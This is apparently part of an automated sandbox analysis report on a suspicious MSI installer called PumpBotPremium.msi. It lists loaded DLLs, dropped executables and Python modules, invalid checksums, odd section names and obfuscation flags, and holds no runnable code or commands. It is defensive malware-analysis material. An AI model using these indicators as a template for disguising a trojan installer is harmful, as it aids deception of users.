Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe File written: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: PumpBotPremium.msi Static file information: File size 63906816 > 1048576
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aipackagechainer.pdb source: aipackagechainer.exe, 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmp, aipackagechainer.exe, 00000003.00000000.1739187011.00000000002AE000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: D:\a\opencv-python\opencv-python\_skbuild\win-amd64-3.7\cmake-build\lib\python3\Release\cv2.pdb source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D76A75000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: BlockchainConnector.exe, 00000007.00000002.1903815403.0000019A0A0E0000.00000002.00000001.01000000.00000010.sdmp
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00237530 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,LoadImageW,FreeLibrary, 3_2_00237530
PE file contains an invalid checksum
Source: _MD5.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xf0c8
Source: _SHA1.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x9f02
Source: _mt19937.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x19d5b
Source: _scrypt.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xdb79
Source: QtGui.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x26ba90
Source: sip.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x28c77
Source: pythoncom310.dll.4.dr Static PE information: real checksum: 0x0 should be: 0xa906f
Source: mtrand.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x90fe9
Source: _Salsa20.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xe31f
Source: _cffi_backend.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x38dc3
Source: _raw_ctr.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xe14e
Source: _raw_cbc.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xd981
Source: _philox.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x1f360
Source: _ghash_clmul.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xf9cb
Source: _rust.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x66978e
Source: _multiarray_umath.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x2dc308
Source: _imagingcms.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x40e07
Source: _umath_linalg.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x2df0e
Source: _generator.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xae69c
Source: md__mypyc.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x22c3d
Source: _raw_aes.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x10e4f
Source: _BLAKE2s.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x10e8d
Source: _cpuid_c.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xe7b0
Source: _raw_ecb.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x4fa5
Source: _multiarray_tests.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x21dfc
Source: _pcg64.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x23bc6
Source: _raw_ocb.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xdbb7
Source: pywintypes310.dll.4.dr Static PE information: real checksum: 0x0 should be: 0x26a6c
Source: _pocketfft_internal.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x24610
Source: _webp.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x89cd9
Source: _raw_aesni.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xec86
Source: _common.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x374d8
Source: _imaging.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x257081
Source: _raw_cfb.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xbbc3
Source: _strxor.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x7233
Source: bit_generator.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x365da
Source: win32crypt.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x2ba12
Source: _raw_ofb.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x4a09
Source: _bounded_integers.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x434b9
Source: _ghash_portable.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x9a05
Source: md.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x50be
Source: _brotli.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xd0a91
Source: _raw_eksblowfish.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0xcfa2
Source: _psutil_windows.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x1f10a
Source: QtCore.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x260d34
Source: QtWidgets.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x4e36b6
Source: _imagingft.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x1a8a9d
Source: _SHA256.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x56a0
Source: aipackagechainer.exe.2.dr Static PE information: real checksum: 0xda46d should be: 0xda93c
Source: _sfc64.pyd.4.dr Static PE information: real checksum: 0x0 should be: 0x13204
PE file contains sections with non-standard names
Source: BlockchainConnector.exe.2.dr Static PE information: section name: .eh_fram
Source: BlockchainConnector.exe.2.dr Static PE information: section name: .xdata
Source: BlockchainConnector.exe.4.dr Static PE information: section name: .eh_fram
Source: BlockchainConnector.exe.4.dr Static PE information: section name: .xdata
Source: libcrypto-1_1.dll.4.dr Static PE information: section name: .00cfg
Source: libssl-1_1.dll.4.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.4.dr Static PE information: section name: .didat
Source: python310.dll.4.dr Static PE information: section name: PyRuntim
Source: qt5core.dll.4.dr Static PE information: section name: .qtmimed
Source: vcruntime140.dll.4.dr Static PE information: section name: _RDATA
Source: opencv_videoio_ffmpeg490_64.dll.4.dr Static PE information: section name: .rodata
Source: opencv_videoio_ffmpeg490_64.dll.4.dr Static PE information: section name: .xdata
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: .xdata
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /4
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /19
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /31
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /45
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /57
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /70
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /81
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr Static PE information: section name: /92
Source: _imagingft.pyd.4.dr Static PE information: section name: _RDATA
Source: cv2.pyd.4.dr Static PE information: section name: IPPCODE
Source: cv2.pyd.4.dr Static PE information: section name: IPPDATA
Source: cv2.pyd.4.dr Static PE information: section name: _RDATA
Source: cv2.pyd.4.dr Static PE information: section name: .debug_a
Source: cv2.pyd.4.dr Static PE information: section name: .debug_i
Source: cv2.pyd.4.dr Static PE information: section name: .debug_s
Source: cv2.pyd.4.dr Static PE information: section name: .debug_l
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_00244444 push esi; ret 3_2_00244447
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Code function: 3_2_0027CEA4 push ecx; ret 3_2_0027CEB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_030E43B0 push eax; ret 11_2_030E43C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_030E4178 push eax; ret 11_2_030E43C3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_030E6092 push 9000005Fh; iretd 11_2_030E6121
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_030E6A7A push esp; ret 11_2_030E6A83
Drops PE files
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_philox.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_cffi_backend.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_MD5.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\tk86t.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_socket.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_portable.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\psutil\_psutil_windows.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_ghash_clmul.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\bit_generator.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\.libs\libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_SHA1.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_queue.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\sip.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PyQt5\QtWidgets.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_sqlite3.pyd Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI8554.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_ctypes.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\python310.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Util\_cpuid_c.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\tcl86t.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7BF7.tmp Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\qt5widgets.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\charset_normalizer\md__mypyc.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_brotli.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cryptography\hazmat\bindings\_rust.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_umath.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_generator.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_common.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7C48.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\PIL\_imaging.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7B99.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\libcrypto-1_1.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\cv2\cv2.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pythoncom310.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\unicodedata.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\_mt19937.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_bz2.pyd Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7CB7.tmp Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Hash\_BLAKE2s.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\pyexpat.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aesni.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\fft\_pocketfft_internal.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\select.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\random\mtrand.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\_lzma.pyd Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe File created: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\numpy\core\_multiarray_tests.pyd Jump to dropped file
